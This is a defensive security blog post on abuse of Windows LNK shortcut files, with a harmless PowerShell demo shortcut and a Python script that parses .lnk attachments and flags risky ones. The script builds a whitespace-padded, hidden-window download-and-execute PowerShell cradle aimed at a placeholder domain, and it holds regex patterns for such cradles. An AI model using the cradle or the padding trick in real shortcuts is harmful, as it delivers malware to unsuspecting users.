Abusing LNK (Windows shortcut) files isn't new, and threat actors across the globe continue to leverage it.
I'll demonstrate why LNK files should be blocked at the email gateway, and blocked by default when they arrive embedded in other files such as archives.
Start with the Target line of an LNK file that launches PowerShell:
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
We then append two switches:
-NoExit
-NoExit keeps the console window open after the commands have run. That is handy for a demo; real payloads usually do the opposite and hide the window.
-c
-c (short for -Command) executes the PowerShell that follows it.
Now we can add any PowerShell that fits in the 255-character limit you run into when editing a shortcut by hand. Note that this limit belongs to the Target box in Explorer's shortcut properties dialog, not to the LNK file format itself: an LNK written programmatically can carry a far longer argument string, and the dialog simply truncates what it displays, which is why real samples pad the arguments with whitespace so that only the innocuous powershell.exe path is visible.
In my sample code we count from 1 to 5, writing a dot to the screen on a single line and waiting a second between each one. When the pipeline ends, the -End block writes "Formatting C Drive Complete!" to the host (some bad humor on my part).
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -NoExit -c 1..5 | foreach { write-host "." -NoNewline; sleep -sec 1} -end {write-host "Formatting C Drive Complete!" }
Given that a full download-and-execute one-liner fits comfortably inside that limit, it's easy to see how threat actors use LNK files to fetch a payload and run it. This is especially true when a URL shortener keeps the download address short.
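As an added example (not part of the original post), here is the kind of Python triage script I would run over .lnk attachments at the mail gateway: it parses the ShellLink header and StringData fields per MS-SHLLINK, pulls out the target and the argument string, and flags the indicators discussed above (inline -Command, a hidden window, a download cradle, whitespace padding, and an argument string longer than the properties dialog can display). The two .lnk blobs it checks are constructed inside the script: the countdown demo from this post, and a whitespace-padded download-and-run shortcut pointing at the reserved example.invalid domain. Real shortcuts also carry an IDList and a LinkInfo block that this minimal parser only skips over, and the 260-character DIALOG_LIMIT is my assumption about what Explorer's Target box shows, not a limit of the file format.

```python
"""Triage .lnk files: parse ShellLink (MS-SHLLINK) StringData and flag shortcuts
that launch PowerShell with inline, hidden or padded command lines."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) this parser needs
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION = 0x04, 0x08, 0x10, 0x20, 0x40
# StringData structures appear in this fixed order when their flag is set
STRING_DATA_ORDER = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")]
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the console minimized, without focus
DIALOG_LIMIT = 260      # assumption: how much of target + arguments Explorer's Target box shows

def build_lnk(target, arguments, show_command=1):
    """Construct a minimal ShellLink (header + two StringData fields) as sample
    input. Real shortcuts also carry an IDList/LinkInfo, which parse_lnk skips."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # header: flags, attrs, 3 FILETIMEs, size, icon index, ShowCommand, hotkey, 3 reserved
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (target, arguments))
    return header + strings

def is_lnk(data):
    return (len(data) >= HEADER_SIZE and data[:4] == struct.pack("<I", HEADER_SIZE)
            and data[4:20] == LINK_CLSID)

def parse_lnk(data):
    """Return ShowCommand plus every StringData field present in the file."""
    if not is_lnk(data):
        raise ValueError("not a ShellLink (.lnk) file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfo is prefixed by its own total size
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"show_command": show_command}
    width = 2 if flags & IS_UNICODE else 1  # CountCharacters counts characters, not bytes
    for bit, name in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)
        raw = data[pos + 2:pos + 2 + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
        pos += 2 + count * width
    return fields

def _abbrev(word, extra=()):
    """powershell.exe accepts any unambiguous prefix of a switch (-c, -com, -command)."""
    return "|".join(list(extra) + [word[:i] for i in range(1, len(word) + 1)])

INLINE_CMD = re.compile(r"(?:^|\s)-(?:%s|%s)\b" % (_abbrev("command"),
                                                   _abbrev("encodedcommand", ["ec"])), re.I)
HIDDEN_WIN = re.compile(r"(?:^|\s)-(?:%s)\s+hidden\b" % _abbrev("windowstyle"), re.I)
CRADLE = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile|"
                    r"invoke-webrequest|\biwr\b|net\.webclient|frombase64string|https?://", re.I)

def assess(fields):
    """Map parsed fields to a sorted list of finding tags (empty means nothing seen)."""
    target = (fields.get("relative_path") or "").lower()
    args = fields.get("arguments") or ""
    findings = set()
    if target.endswith("powershell.exe") or target.endswith("pwsh.exe"):
        findings.add("target:powershell")
    if INLINE_CMD.search(args):
        findings.add("args:inline-command")
    if HIDDEN_WIN.search(args):
        findings.add("args:hidden-window")
    if CRADLE.search(args):
        findings.add("args:download-cradle")
    if len(args) - len(args.lstrip()) >= 16:        # leading whitespace pushes the payload out of view
        findings.add("args:whitespace-padding")
    if len(target) + 1 + len(args) > DIALOG_LIMIT:  # the properties dialog would truncate this
        findings.add("args:exceeds-dialog-limit")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.add("header:minimized-no-activate")
    return sorted(findings)

def scan(data):
    return assess(parse_lnk(data))

# Constructed samples: the countdown demo from this post, and a whitespace-padded download-and-run
# shortcut of the kind the post warns about (example.invalid is reserved; nothing is ever fetched).
PS_TARGET = r"%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe"
DEMO_LNK = build_lnk(PS_TARGET, '-NoExit -c 1..5 | foreach { write-host "." -NoNewline; '
                                'sleep -sec 1 } -end { write-host "Formatting C Drive Complete!" }')
PADDED_LNK = build_lnk(PS_TARGET, " " * 300 + "-w hidden -nop -c \"iex ((New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/s'))\"", show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for label, blob in (("demo", DEMO_LNK), ("padded", PADDED_LNK)):
        print(label, scan(blob))
```

To run it against a real attachment, read the file in binary mode and pass the bytes to scan(); anything that comes back with target:powershell plus an args: tag is worth quarantining. The padding and dialog-limit checks are there precisely because the author's by-hand limit does not apply to shortcuts built with a script.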
Inspiration for this project:
https://thehackernews.com/2023/05/north-koreas-scarcruft-deploys-rokrat.html?m=1
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/